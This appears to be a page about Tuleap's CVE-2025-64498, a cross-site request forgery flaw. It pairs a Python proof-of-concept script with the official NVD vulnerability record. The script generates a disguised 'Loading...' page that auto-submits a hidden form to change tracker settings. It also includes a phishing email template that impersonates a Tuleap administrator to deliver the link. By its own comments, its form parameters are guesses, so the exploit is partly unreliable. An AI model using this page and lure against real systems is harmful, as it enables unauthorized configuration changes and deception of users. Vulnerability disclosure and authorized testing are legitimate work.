CVE-2025-64498

# CVE-2025-64498 PoC - CSRF Attack for Tuleap Tracker Settings Modification # This PoC demonstrates how an attacker can trick a victim into changing tracker settings import html def generate_csrf_poc(target_url, tracker_id): """ Generate CSRF PoC HTML for Tuleap tracker settings modification Args: target_url: Base URL of the vulnerable Tuleap instance tracker_id: ID of the target tracker to modify Returns: Malicious HTML page that will auto-submit the CSRF attack """ # Tuleap tracker settings update endpoint settings_endpoint = f"{target_url}/tracker/?aid={tracker_id}" # Example malicious configuration parameters # In real attack, these would be crafted based on specific vulnerability details malicious_payload = { "func": "admin-update", "workflow_mode": "restricted", "enable_notifications": "0", "csrf_token": "attacker-controlled-or-stolen" } # Generate HTML form with auto-submit form_fields = "" for key, value in malicious_payload.items(): escaped_value = html.escape(str(value)) form_fields += f' <input type="hidden" name="{key}" value="{escaped_value}">\n' poc_html = f''' <!DOCTYPE html> <html> <head> <title>Loading...</title> <style> body {{ display: none; background-color: #f0f0f0; }} .loader {{ position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); border: 5px solid #f3f3f3; border-top: 5px solid #3498db; border-radius: 50%; width: 50px; height: 50px; animation: spin 2s linear infinite; }} @keyframes spin {{ 0% {{ transform: rotate(0deg); }} 100% {{ transform: rotate(360deg); }} }} </style> </head> <body> <div class="loader"></div> <form id="csrf_form" action="{settings_endpoint}" method="POST"> {form_fields} </form> <script> // Auto-submit the form when page loads window.onload = function() {{ document.getElementById('csrf_form').submit(); }}; </script> </body> </html> ''' return poc_html def generate_phishing_email(): """ Generate phishing email content to deliver the CSRF attack """ email_template = ''' Subject: Important: Update Your Project Tracker Configuration Dear Tuleap User, We have detected some configuration issues with your project tracker. Please click the link below to verify and update your settings: [Mlicious Link Here] If you did not request this, please ignore this email. Best regards, Tuleap System Administrator ''' return email_template if __name__ == "__main__": # Example usage target = "https://vulnerable-tuleap.example.com" tracker = "45593" poc = generate_csrf_poc(target, tracker) with open("csrf_exploit.html", "w", encoding="utf-8") as f: f.write(poc) print("CSRF PoC generated: csrf_exploit.html") print("\n[!] Disclaimer: This PoC is for educational and authorized testing purposes only.")

{"cve": {"id": "CVE-2025-64498", "sourceIdentifier": "[email protected]", "published": "2025-12-08T23:15:48.153", "lastModified": "2025-12-10T21:04:56.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tuleap is an Open Source Suite for management of software development and collaboration. Tuleap Community Edition versions below 17.0.99.1762444754 and Tuleap Enterprise Edition versions prior to 17.0-2, 16.13-7 and 16.12-10 allow attackers trick victims into changing tracker general settings. This issue is fixed in version Tuleap Community Edition version 17.0.99.1762444754 and Tuleap Enterprise Edition versions 17.0-2, 16.13-7 and 16.12-10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionEndExcluding": "16.12-10", "matchCriteriaId": "286870BF-3315-4B78-AC67-97EB2D5F34ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:community:*:*:*", "versionEndExcluding": "17.0.99.1762444754", "matchCriteriaId": "CEF7B557-D311-40F3-9E94-DCEBD375B9F9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "16.13", "versionEndExcluding": "16.13-7", "matchCriteriaId": "CBD9092A-8E4A-43EF-B9B8-D8BDA9D30430"}, {"vulnerable": true, "criteria": "cpe:2.3:a:enalean:tuleap:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.0", "versionEndExcluding": "17.0-2", "matchCriteriaId": "F96A9306-179A-48BD-A2D9-CB081E9747B8"}]}]}], "references": [{"url": "https://github.com/Enalean/tuleap/commit/993316dd6a291bb3937cb7a4571eaab0e7d55370", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Enalean/tuleap/security/advisories/GHSA-vxfh-h8p6-p5rg", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=993316dd6a291bb3937cb7a4571eaab0e7d55370", "source": "[email protected]", "tags": ["Patch", "Broken Link"]}, {"url": "https://tuleap.net/plugins/tracker/?aid=45593", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}